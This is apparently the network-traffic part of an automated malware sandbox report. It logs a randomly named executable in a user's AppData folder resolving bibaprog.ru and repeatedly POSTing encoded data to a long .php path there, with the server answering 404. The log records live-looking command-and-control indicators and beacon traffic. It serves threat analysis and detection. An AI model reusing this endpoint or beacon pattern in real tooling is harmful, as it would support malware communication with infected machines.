Jan 13, 2025 13:38:13.209248066 CET	49981	80	192.168.2.5	104.21.64.1
Jan 13, 2025 13:38:13.214106083 CET	80	49981	104.21.64.1	192.168.2.5
Jan 13, 2025 13:38:13.300182104 CET	80	49981	104.21.64.1	192.168.2.5
Jan 13, 2025 13:38:13.349539995 CET	49981	80	192.168.2.5	104.21.64.1
Jan 13, 2025 13:38:13.531755924 CET	80	49981	104.21.64.1	192.168.2.5
Jan 13, 2025 13:38:13.583900928 CET	49981	80	192.168.2.5	104.21.64.1
Jan 13, 2025 13:38:14.148427963 CET	49981	80	192.168.2.5	104.21.64.1
Jan 13, 2025 13:38:20.841469049 CET	49982	80	192.168.2.5	104.21.64.1
Jan 13, 2025 13:38:20.846400976 CET	80	49982	104.21.64.1	192.168.2.5
Jan 13, 2025 13:38:20.848141909 CET	49982	80	192.168.2.5	104.21.64.1
Jan 13, 2025 13:38:20.848382950 CET	49982	80	192.168.2.5	104.21.64.1
Jan 13, 2025 13:38:20.853104115 CET	80	49982	104.21.64.1	192.168.2.5
Jan 13, 2025 13:38:21.194999933 CET	49982	80	192.168.2.5	104.21.64.1
Jan 13, 2025 13:38:21.200007915 CET	80	49982	104.21.64.1	192.168.2.5
Jan 13, 2025 13:38:21.312488079 CET	80	49982	104.21.64.1	192.168.2.5
Jan 13, 2025 13:38:21.365329981 CET	49982	80	192.168.2.5	104.21.64.1
Jan 13, 2025 13:38:21.545388937 CET	80	49982	104.21.64.1	192.168.2.5
Jan 13, 2025 13:38:21.599550962 CET	49982	80	192.168.2.5	104.21.64.1
Jan 13, 2025 13:38:22.041461945 CET	49982	80	192.168.2.5	104.21.64.1
Jan 13, 2025 13:38:33.185174942 CET	49983	80	192.168.2.5	104.21.64.1
Jan 13, 2025 13:38:33.190124035 CET	80	49983	104.21.64.1	192.168.2.5
Jan 13, 2025 13:38:33.190298080 CET	49983	80	192.168.2.5	104.21.64.1
Jan 13, 2025 13:38:33.190608025 CET	49983	80	192.168.2.5	104.21.64.1
Jan 13, 2025 13:38:33.195421934 CET	80	49983	104.21.64.1	192.168.2.5
Jan 13, 2025 13:38:33.537319899 CET	49983	80	192.168.2.5	104.21.64.1
Jan 13, 2025 13:38:33.542292118 CET	80	49983	104.21.64.1	192.168.2.5
Jan 13, 2025 13:38:33.652694941 CET	80	49983	104.21.64.1	192.168.2.5
Jan 13, 2025 13:38:33.693350077 CET	49983	80	192.168.2.5	104.21.64.1
Jan 13, 2025 13:38:33.882955074 CET	80	49983	104.21.64.1	192.168.2.5
Jan 13, 2025 13:38:33.927719116 CET	49983	80	192.168.2.5	104.21.64.1
Jan 13, 2025 13:38:33.973479986 CET	80	49983	104.21.64.1	192.168.2.5
Jan 13, 2025 13:38:34.021475077 CET	49983	80	192.168.2.5	104.21.64.1
Jan 13, 2025 13:38:34.234869003 CET	49983	80	192.168.2.5	104.21.64.1
Jan 13, 2025 13:38:40.475111961 CET	49984	80	192.168.2.5	104.21.64.1
Jan 13, 2025 13:38:40.480319977 CET	80	49984	104.21.64.1	192.168.2.5
Jan 13, 2025 13:38:40.480417967 CET	49984	80	192.168.2.5	104.21.64.1
Jan 13, 2025 13:38:40.480601072 CET	49984	80	192.168.2.5	104.21.64.1
Jan 13, 2025 13:38:40.485447884 CET	80	49984	104.21.64.1	192.168.2.5
Jan 13, 2025 13:38:40.834306955 CET	49984	80	192.168.2.5	104.21.64.1
Jan 13, 2025 13:38:40.839397907 CET	80	49984	104.21.64.1	192.168.2.5
Jan 13, 2025 13:38:40.944037914 CET	80	49984	104.21.64.1	192.168.2.5
Jan 13, 2025 13:38:40.990269899 CET	49984	80	192.168.2.5	104.21.64.1
Jan 13, 2025 13:38:41.169760942 CET	80	49984	104.21.64.1	192.168.2.5
Jan 13, 2025 13:38:41.209033966 CET	49984	80	192.168.2.5	104.21.64.1
Jan 13, 2025 13:38:41.581460953 CET	49984	80	192.168.2.5	104.21.64.1
Jan 13, 2025 13:38:51.692066908 CET	49985	80	192.168.2.5	104.21.64.1
Jan 13, 2025 13:38:51.700331926 CET	80	49985	104.21.64.1	192.168.2.5
Jan 13, 2025 13:38:51.704345942 CET	49985	80	192.168.2.5	104.21.64.1
Jan 13, 2025 13:38:51.704562902 CET	49985	80	192.168.2.5	104.21.64.1
Jan 13, 2025 13:38:51.712239981 CET	80	49985	104.21.64.1	192.168.2.5
Jan 13, 2025 13:38:52.052949905 CET	49985	80	192.168.2.5	104.21.64.1
Jan 13, 2025 13:38:52.060323954 CET	80	49985	104.21.64.1	192.168.2.5
Jan 13, 2025 13:38:52.152313948 CET	80	49985	104.21.64.1	192.168.2.5
Jan 13, 2025 13:38:52.193443060 CET	49985	80	192.168.2.5	104.21.64.1
Jan 13, 2025 13:38:52.373850107 CET	80	49985	104.21.64.1	192.168.2.5
Jan 13, 2025 13:38:52.427778006 CET	49985	80	192.168.2.5	104.21.64.1
Jan 13, 2025 13:38:52.456927061 CET	49985	80	192.168.2.5	104.21.64.1
Jan 13, 2025 13:39:02.572850943 CET	49986	80	192.168.2.5	104.21.64.1
Jan 13, 2025 13:39:02.577756882 CET	80	49986	104.21.64.1	192.168.2.5
Jan 13, 2025 13:39:02.577852964 CET	49986	80	192.168.2.5	104.21.64.1
Jan 13, 2025 13:39:02.578071117 CET	49986	80	192.168.2.5	104.21.64.1
Jan 13, 2025 13:39:02.582808018 CET	80	49986	104.21.64.1	192.168.2.5
Jan 13, 2025 13:39:02.967264891 CET	49986	80	192.168.2.5	104.21.64.1
Jan 13, 2025 13:39:02.972230911 CET	80	49986	104.21.64.1	192.168.2.5
Jan 13, 2025 13:39:03.049335003 CET	80	49986	104.21.64.1	192.168.2.5
Jan 13, 2025 13:39:03.101484060 CET	49986	80	192.168.2.5	104.21.64.1
Jan 13, 2025 13:39:03.282569885 CET	80	49986	104.21.64.1	192.168.2.5
Jan 13, 2025 13:39:03.334207058 CET	49986	80	192.168.2.5	104.21.64.1
Jan 13, 2025 13:39:03.390079975 CET	49986	80	192.168.2.5	104.21.64.1
Jan 13, 2025 13:39:09.387398005 CET	49987	80	192.168.2.5	104.21.64.1
Jan 13, 2025 13:39:09.392338991 CET	80	49987	104.21.64.1	192.168.2.5
Jan 13, 2025 13:39:09.392441988 CET	49987	80	192.168.2.5	104.21.64.1
Jan 13, 2025 13:39:09.392708063 CET	49987	80	192.168.2.5	104.21.64.1
Jan 13, 2025 13:39:09.397463083 CET	80	49987	104.21.64.1	192.168.2.5
Jan 13, 2025 13:39:09.740566969 CET	49987	80	192.168.2.5	104.21.64.1
Jan 13, 2025 13:39:09.747400999 CET	80	49987	104.21.64.1	192.168.2.5
Jan 13, 2025 13:39:09.835675955 CET	80	49987	104.21.64.1	192.168.2.5
Jan 13, 2025 13:39:09.880948067 CET	49987	80	192.168.2.5	104.21.64.1
Jan 13, 2025 13:39:10.062700987 CET	80	49987	104.21.64.1	192.168.2.5
Jan 13, 2025 13:39:10.115348101 CET	49987	80	192.168.2.5	104.21.64.1
Jan 13, 2025 13:39:10.188918114 CET	49987	80	192.168.2.5	104.21.64.1
Jan 13, 2025 13:39:20.471784115 CET	49988	80	192.168.2.5	104.21.64.1
Jan 13, 2025 13:39:20.575521946 CET	80	49988	104.21.64.1	192.168.2.5
Jan 13, 2025 13:39:20.575659037 CET	49988	80	192.168.2.5	104.21.64.1
Jan 13, 2025 13:39:20.575989008 CET	49988	80	192.168.2.5	104.21.64.1
Jan 13, 2025 13:39:20.580784082 CET	80	49988	104.21.64.1	192.168.2.5
Jan 13, 2025 13:39:20.928175926 CET	49988	80	192.168.2.5	104.21.64.1
Jan 13, 2025 13:39:20.936393023 CET	80	49988	104.21.64.1	192.168.2.5
Jan 13, 2025 13:39:21.021404028 CET	80	49988	104.21.64.1	192.168.2.5
Jan 13, 2025 13:39:21.068494081 CET	49988	80	192.168.2.5	104.21.64.1
Jan 13, 2025 13:39:21.256438017 CET	80	49988	104.21.64.1	192.168.2.5
Jan 13, 2025 13:39:21.302871943 CET	49988	80	192.168.2.5	104.21.64.1
Jan 13, 2025 13:39:21.357960939 CET	49988	80	192.168.2.5	104.21.64.1
Jan 13, 2025 13:39:31.454940081 CET	49989	80	192.168.2.5	104.21.64.1
Jan 13, 2025 13:39:31.459840059 CET	80	49989	104.21.64.1	192.168.2.5
Jan 13, 2025 13:39:31.459904909 CET	49989	80	192.168.2.5	104.21.64.1
Jan 13, 2025 13:39:31.460133076 CET	49989	80	192.168.2.5	104.21.64.1
Jan 13, 2025 13:39:31.464845896 CET	80	49989	104.21.64.1	192.168.2.5
Jan 13, 2025 13:39:31.818763018 CET	49989	80	192.168.2.5	104.21.64.1
Jan 13, 2025 13:39:31.823759079 CET	80	49989	104.21.64.1	192.168.2.5
Jan 13, 2025 13:39:31.942730904 CET	80	49989	104.21.64.1	192.168.2.5
Jan 13, 2025 13:39:31.990406036 CET	49989	80	192.168.2.5	104.21.64.1
Jan 13, 2025 13:39:32.165982008 CET	80	49989	104.21.64.1	192.168.2.5
Jan 13, 2025 13:39:32.209131956 CET	49989	80	192.168.2.5	104.21.64.1
Jan 13, 2025 13:39:32.248148918 CET	49989	80	192.168.2.5	104.21.64.1
Jan 13, 2025 13:39:42.398201942 CET	49990	80	192.168.2.5	104.21.64.1
Jan 13, 2025 13:39:42.403119087 CET	80	49990	104.21.64.1	192.168.2.5
Jan 13, 2025 13:39:42.403239965 CET	49990	80	192.168.2.5	104.21.64.1
Jan 13, 2025 13:39:42.406017065 CET	49990	80	192.168.2.5	104.21.64.1
Jan 13, 2025 13:39:42.410830975 CET	80	49990	104.21.64.1	192.168.2.5
Jan 13, 2025 13:39:42.756401062 CET	49990	80	192.168.2.5	104.21.64.1
Jan 13, 2025 13:39:42.763808966 CET	80	49990	104.21.64.1	192.168.2.5
Jan 13, 2025 13:39:42.854703903 CET	80	49990	104.21.64.1	192.168.2.5
Jan 13, 2025 13:39:42.896656036 CET	49990	80	192.168.2.5	104.21.64.1
Jan 13, 2025 13:39:43.074819088 CET	80	49990	104.21.64.1	192.168.2.5
Jan 13, 2025 13:39:43.115430117 CET	49990	80	192.168.2.5	104.21.64.1
Jan 13, 2025 13:39:43.161225080 CET	49990	80	192.168.2.5	104.21.64.1
Jan 13, 2025 13:39:53.936543941 CET	49991	80	192.168.2.5	104.21.64.1
Jan 13, 2025 13:39:53.952125072 CET	80	49991	104.21.64.1	192.168.2.5
Jan 13, 2025 13:39:53.952395916 CET	49991	80	192.168.2.5	104.21.64.1
Jan 13, 2025 13:39:53.952670097 CET	49991	80	192.168.2.5	104.21.64.1
Jan 13, 2025 13:39:53.957412004 CET	80	49991	104.21.64.1	192.168.2.5
Jan 13, 2025 13:39:54.303354979 CET	49991	80	192.168.2.5	104.21.64.1
Jan 13, 2025 13:39:54.308327913 CET	80	49991	104.21.64.1	192.168.2.5
Jan 13, 2025 13:39:54.396323919 CET	80	49991	104.21.64.1	192.168.2.5
Jan 13, 2025 13:39:54.443562984 CET	49991	80	192.168.2.5	104.21.64.1
Jan 13, 2025 13:39:54.547436953 CET	80	49991	104.21.64.1	192.168.2.5
Jan 13, 2025 13:39:54.599817038 CET	49991	80	192.168.2.5	104.21.64.1
Jan 13, 2025 13:39:54.641463041 CET	49991	80	192.168.2.5	104.21.64.1
Jan 13, 2025 13:40:05.022263050 CET	49992	80	192.168.2.5	104.21.64.1
Jan 13, 2025 13:40:05.027295113 CET	80	49992	104.21.64.1	192.168.2.5
Jan 13, 2025 13:40:05.027407885 CET	49992	80	192.168.2.5	104.21.64.1
Jan 13, 2025 13:40:05.027635098 CET	49992	80	192.168.2.5	104.21.64.1
Jan 13, 2025 13:40:05.032366991 CET	80	49992	104.21.64.1	192.168.2.5
Jan 13, 2025 13:40:05.381364107 CET	49992	80	192.168.2.5	104.21.64.1
Jan 13, 2025 13:40:05.386286020 CET	80	49992	104.21.64.1	192.168.2.5
Jan 13, 2025 13:40:05.481450081 CET	80	49992	104.21.64.1	192.168.2.5
Jan 13, 2025 13:40:05.537338972 CET	49992	80	192.168.2.5	104.21.64.1
Jan 13, 2025 13:40:05.719983101 CET	80	49992	104.21.64.1	192.168.2.5
Jan 13, 2025 13:40:05.771725893 CET	49992	80	192.168.2.5	104.21.64.1
Jan 13, 2025 13:40:05.796695948 CET	49992	80	192.168.2.5	104.21.64.1
Jan 13, 2025 13:40:11.834348917 CET	49993	80	192.168.2.5	104.21.64.1
Jan 13, 2025 13:40:11.839255095 CET	80	49993	104.21.64.1	192.168.2.5
Jan 13, 2025 13:40:11.839379072 CET	49993	80	192.168.2.5	104.21.64.1
Jan 13, 2025 13:40:11.839567900 CET	49993	80	192.168.2.5	104.21.64.1
Jan 13, 2025 13:40:11.844377995 CET	80	49993	104.21.64.1	192.168.2.5
Jan 13, 2025 13:40:12.193876028 CET	49993	80	192.168.2.5	104.21.64.1
Jan 13, 2025 13:40:12.198807001 CET	80	49993	104.21.64.1	192.168.2.5
Jan 13, 2025 13:40:12.296238899 CET	80	49993	104.21.64.1	192.168.2.5
Jan 13, 2025 13:40:12.349847078 CET	49993	80	192.168.2.5	104.21.64.1
Jan 13, 2025 13:40:12.525507927 CET	80	49993	104.21.64.1	192.168.2.5
Jan 13, 2025 13:40:12.568645000 CET	49993	80	192.168.2.5	104.21.64.1
Jan 13, 2025 13:40:12.597683907 CET	49993	80	192.168.2.5	104.21.64.1
Jan 13, 2025 13:40:22.807214975 CET	49994	80	192.168.2.5	104.21.64.1
Jan 13, 2025 13:40:22.812186956 CET	80	49994	104.21.64.1	192.168.2.5
Jan 13, 2025 13:40:22.812319994 CET	49994	80	192.168.2.5	104.21.64.1
Jan 13, 2025 13:40:22.812485933 CET	49994	80	192.168.2.5	104.21.64.1
Jan 13, 2025 13:40:22.817214012 CET	80	49994	104.21.64.1	192.168.2.5
Jan 13, 2025 13:40:23.163531065 CET	49994	80	192.168.2.5	104.21.64.1
Jan 13, 2025 13:40:23.168796062 CET	80	49994	104.21.64.1	192.168.2.5
Jan 13, 2025 13:40:23.275149107 CET	80	49994	104.21.64.1	192.168.2.5
Jan 13, 2025 13:40:23.318636894 CET	49994	80	192.168.2.5	104.21.64.1
Jan 13, 2025 13:40:23.504333973 CET	80	49994	104.21.64.1	192.168.2.5
Jan 13, 2025 13:40:23.553025007 CET	49994	80	192.168.2.5	104.21.64.1
Jan 13, 2025 13:40:23.596265078 CET	80	49994	104.21.64.1	192.168.2.5
Jan 13, 2025 13:40:23.646786928 CET	49994	80	192.168.2.5	104.21.64.1
Jan 13, 2025 13:40:23.673702002 CET	49994	80	192.168.2.5	104.21.64.1
Jan 13, 2025 13:40:33.808193922 CET	49995	80	192.168.2.5	104.21.64.1
Jan 13, 2025 13:40:33.813142061 CET	80	49995	104.21.64.1	192.168.2.5
Jan 13, 2025 13:40:33.813296080 CET	49995	80	192.168.2.5	104.21.64.1
Jan 13, 2025 13:40:33.813540936 CET	49995	80	192.168.2.5	104.21.64.1
Jan 13, 2025 13:40:33.818336964 CET	80	49995	104.21.64.1	192.168.2.5
Jan 13, 2025 13:40:34.162719965 CET	49995	80	192.168.2.5	104.21.64.1
Jan 13, 2025 13:40:34.167613029 CET	80	49995	104.21.64.1	192.168.2.5
Jan 13, 2025 13:40:34.273008108 CET	80	49995	104.21.64.1	192.168.2.5
Jan 13, 2025 13:40:34.318680048 CET	49995	80	192.168.2.5	104.21.64.1
Jan 13, 2025 13:40:34.502424955 CET	80	49995	104.21.64.1	192.168.2.5
Jan 13, 2025 13:40:34.553049088 CET	49995	80	192.168.2.5	104.21.64.1
Jan 13, 2025 13:40:34.606235981 CET	49995	80	192.168.2.5	104.21.64.1
Jan 13, 2025 13:40:44.826500893 CET	49996	80	192.168.2.5	104.21.64.1
Jan 13, 2025 13:40:44.998367071 CET	80	49996	104.21.64.1	192.168.2.5
Jan 13, 2025 13:40:44.998519897 CET	49996	80	192.168.2.5	104.21.64.1
Jan 13, 2025 13:40:44.998869896 CET	49996	80	192.168.2.5	104.21.64.1
Jan 13, 2025 13:40:45.003660917 CET	80	49996	104.21.64.1	192.168.2.5
Jan 13, 2025 13:40:45.351239920 CET	49996	80	192.168.2.5	104.21.64.1
Jan 13, 2025 13:40:45.356132030 CET	80	49996	104.21.64.1	192.168.2.5
Jan 13, 2025 13:40:45.452538967 CET	80	49996	104.21.64.1	192.168.2.5
Jan 13, 2025 13:40:45.506195068 CET	49996	80	192.168.2.5	104.21.64.1
Jan 13, 2025 13:40:45.678194046 CET	80	49996	104.21.64.1	192.168.2.5
Jan 13, 2025 13:40:45.727325916 CET	49996	80	192.168.2.5	104.21.64.1
Jan 13, 2025 13:40:46.161680937 CET	49996	80	192.168.2.5	104.21.64.1
Jan 13, 2025 13:40:56.324413061 CET	49997	80	192.168.2.5	104.21.64.1
Jan 13, 2025 13:40:56.329583883 CET	80	49997	104.21.64.1	192.168.2.5
Jan 13, 2025 13:40:56.329694033 CET	49997	80	192.168.2.5	104.21.64.1
Jan 13, 2025 13:40:56.330138922 CET	49997	80	192.168.2.5	104.21.64.1
Jan 13, 2025 13:40:56.334975958 CET	80	49997	104.21.64.1	192.168.2.5
Jan 13, 2025 13:40:56.678443909 CET	49997	80	192.168.2.5	104.21.64.1
Jan 13, 2025 13:40:56.683432102 CET	80	49997	104.21.64.1	192.168.2.5
Jan 13, 2025 13:40:56.793078899 CET	80	49997	104.21.64.1	192.168.2.5
Jan 13, 2025 13:40:56.849991083 CET	49997	80	192.168.2.5	104.21.64.1
Jan 13, 2025 13:40:57.021229029 CET	80	49997	104.21.64.1	192.168.2.5
Jan 13, 2025 13:40:57.068923950 CET	49997	80	192.168.2.5	104.21.64.1
Jan 13, 2025 13:40:57.108231068 CET	49997	80	192.168.2.5	104.21.64.1
Jan 13, 2025 13:41:07.357198000 CET	49998	80	192.168.2.5	104.21.64.1
Jan 13, 2025 13:41:07.363202095 CET	80	49998	104.21.64.1	192.168.2.5
Jan 13, 2025 13:41:07.363339901 CET	49998	80	192.168.2.5	104.21.64.1
Jan 13, 2025 13:41:07.363792896 CET	49998	80	192.168.2.5	104.21.64.1
Jan 13, 2025 13:41:07.368697882 CET	80	49998	104.21.64.1	192.168.2.5
Jan 13, 2025 13:41:07.709794998 CET	49998	80	192.168.2.5	104.21.64.1
Jan 13, 2025 13:41:07.715118885 CET	80	49998	104.21.64.1	192.168.2.5
Jan 13, 2025 13:41:07.807852030 CET	80	49998	104.21.64.1	192.168.2.5
Jan 13, 2025 13:41:07.849997997 CET	49998	80	192.168.2.5	104.21.64.1
Jan 13, 2025 13:41:08.036006927 CET	80	49998	104.21.64.1	192.168.2.5
Jan 13, 2025 13:41:08.084373951 CET	49998	80	192.168.2.5	104.21.64.1
Jan 13, 2025 13:41:08.108423948 CET	49998	80	192.168.2.5	104.21.64.1

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Jan 13, 2025 13:37:12.277041912 CET	56794	53	192.168.2.5	1.1.1.1
Jan 13, 2025 13:37:12.439838886 CET	53	56794	1.1.1.1	192.168.2.5

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Jan 13, 2025 13:37:12.277041912 CET	192.168.2.5	1.1.1.1	0x2e57	Standard query (0)	bibaprog.ru	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	Address	Type	Class	DNS over HTTPS
Jan 13, 2025 13:37:12.439838886 CET	1.1.1.1	192.168.2.5	0x2e57	No error (0)	bibaprog.ru	104.21.64.1	A (IP address)	IN (0x0001)	false
Jan 13, 2025 13:37:12.439838886 CET	1.1.1.1	192.168.2.5	0x2e57	No error (0)	bibaprog.ru	104.21.80.1	A (IP address)	IN (0x0001)	false
Jan 13, 2025 13:37:12.439838886 CET	1.1.1.1	192.168.2.5	0x2e57	No error (0)	bibaprog.ru	104.21.32.1	A (IP address)	IN (0x0001)	false
Jan 13, 2025 13:37:12.439838886 CET	1.1.1.1	192.168.2.5	0x2e57	No error (0)	bibaprog.ru	104.21.16.1	A (IP address)	IN (0x0001)	false
Jan 13, 2025 13:37:12.439838886 CET	1.1.1.1	192.168.2.5	0x2e57	No error (0)	bibaprog.ru	104.21.112.1	A (IP address)	IN (0x0001)	false
Jan 13, 2025 13:37:12.439838886 CET	1.1.1.1	192.168.2.5	0x2e57	No error (0)	bibaprog.ru	104.21.48.1	A (IP address)	IN (0x0001)	false
Jan 13, 2025 13:37:12.439838886 CET	1.1.1.1	192.168.2.5	0x2e57	No error (0)	bibaprog.ru	104.21.96.1	A (IP address)	IN (0x0001)	false

HTTP Request Dependency Graph

bibaprog.ru

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.5	49704	104.21.64.1	80	2520	C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exe

Timestamp	Bytes transferred	Direction	Data
Jan 13, 2025 13:37:12.451575994 CET	347	OUT	POST /ProviderEternallineauthmultiTrackwordpressWpDownloads.php HTTP/1.1 Content-Type: application/octet-stream User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Edg/95.0.1020.53 Host: bibaprog.ru Content-Length: 344 Expect: 100-continue Connection: Keep-Alive
Jan 13, 2025 13:37:12.803474903 CET	344	OUT	Data Raw: 00 03 04 03 06 01 04 00 05 06 02 01 02 07 01 05 00 04 05 00 02 07 03 09 00 04 0d 00 07 00 01 05 0c 02 03 01 01 06 04 07 0c 0b 07 51 06 07 05 05 04 53 0c 0e 0a 02 01 07 04 02 03 0c 04 04 05 58 01 0a 0d 0b 05 03 05 01 0e 02 0d 06 0f 0c 0f 08 04 03 Data Ascii: QSX]USW\L~k^r`\Su[\|kUfYwBh\|co_ll`_zsv\|}xCcgtj_~V@A{ST}Lu
Jan 13, 2025 13:37:12.902009964 CET	25	IN	HTTP/1.1 100 Continue
Jan 13, 2025 13:37:13.141153097 CET	1018	IN	HTTP/1.1 404 Not Found Date: Mon, 13 Jan 2025 12:37:13 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive cf-cache-status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=LISi%2FyKNQHOROXN0SwqwNEZf6NVi2PaPrD8%2BkzPc6flTPWKpvYWWjiTU8nG%2BuUkWaHPJPMZUHGfYFnXaNmYJtbYhUIGDUOIjLozIkFwX4eGbTLAVPNVZ8I%2FY6rfepw%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 90156fb35dae4414-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=3400&min_rtt=1691&rtt_var=4052&sent=2&recv=4&lost=0&retrans=0&sent_bytes=25&recv_bytes=691&delivery_rate=95027&cwnd=179&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 64 35 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 0d 0a 0d 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: d5<html><head><meta http-equiv="content-type" content="text/html; charset=UTF-8"><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.5	49745	104.21.64.1	80	6512	C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exe

Timestamp	Bytes transferred	Direction	Data
Jan 13, 2025 13:37:24.403089046 CET	282	OUT	POST /ProviderEternallineauthmultiTrackwordpressWpDownloads.php HTTP/1.1 Content-Type: application/octet-stream User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0 Host: bibaprog.ru Content-Length: 344 Expect: 100-continue Connection: Keep-Alive
Jan 13, 2025 13:37:24.770590067 CET	344	OUT	Data Raw: 00 07 01 07 06 09 01 03 05 06 02 01 02 02 01 01 00 0b 05 0f 02 07 03 00 02 54 0a 04 06 05 01 06 0a 02 04 0c 01 04 03 0b 0e 54 06 05 04 03 04 02 03 00 0b 0a 0d 04 04 0b 04 03 05 05 05 00 06 0b 03 06 0f 0a 06 06 04 54 0e 0e 0c 52 0d 01 0c 03 02 00 Data Ascii: TTTR^\L}R\|pi_`b[buThB}t`M^oBsEl^i_}nhtgo_je~V@xSP}LW
Jan 13, 2025 13:37:24.851700068 CET	25	IN	HTTP/1.1 100 Continue
Jan 13, 2025 13:37:25.096684933 CET	1014	IN	HTTP/1.1 404 Not Found Date: Mon, 13 Jan 2025 12:37:25 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive cf-cache-status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=%2FRWxU10oe72zy83fkiUiOToSFQ8f7imE45wdMCVE31EHtK7R0EONs11BCWTsUVH6nsKRaUWjIdKio9PDE83nc0m2imGuBKJdC95V6n%2BisQzkFOjf%2B0AQ2XtOcUb3TA%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 90156ffe0c724414-EWR alt-svc: h2=":443"; ma=60 server-timing: cfL4;desc="?proto=TCP&rtt=3236&min_rtt=1663&rtt_var=3771&sent=3&recv=4&lost=0&retrans=0&sent_bytes=25&recv_bytes=626&delivery_rate=102427&cwnd=179&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 64 35 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 0d 0a 0d 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: d5<html><head><meta http-equiv="content-type" content="text/html; charset=UTF-8"><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2	192.168.2.5	49796	104.21.64.1	80	2876	C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exe

Timestamp	Bytes transferred	Direction	Data
Jan 13, 2025 13:37:32.332403898 CET	294	OUT	POST /ProviderEternallineauthmultiTrackwordpressWpDownloads.php HTTP/1.1 Content-Type: application/octet-stream User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0 Host: bibaprog.ru Content-Length: 344 Expect: 100-continue Connection: Keep-Alive
Jan 13, 2025 13:37:32.677859068 CET	344	OUT	Data Raw: 00 01 04 0d 06 01 01 0a 05 06 02 01 02 01 01 00 00 02 05 0c 02 01 03 09 02 0e 0a 04 03 0f 06 07 0f 54 06 0b 02 07 06 04 0c 04 02 01 07 00 05 52 06 54 0f 0b 0f 55 04 57 06 03 04 56 04 0b 00 0a 03 03 0e 00 07 06 06 03 0e 54 0b 01 0c 54 0f 03 06 0c Data Ascii: TRTUWVTT[XQSP\L~^}Zcb[u`Ak\|ivk_\|phlR]{s~DhSRwIU[je~V@xCr~bu
Jan 13, 2025 13:37:32.817519903 CET	25	IN	HTTP/1.1 100 Continue
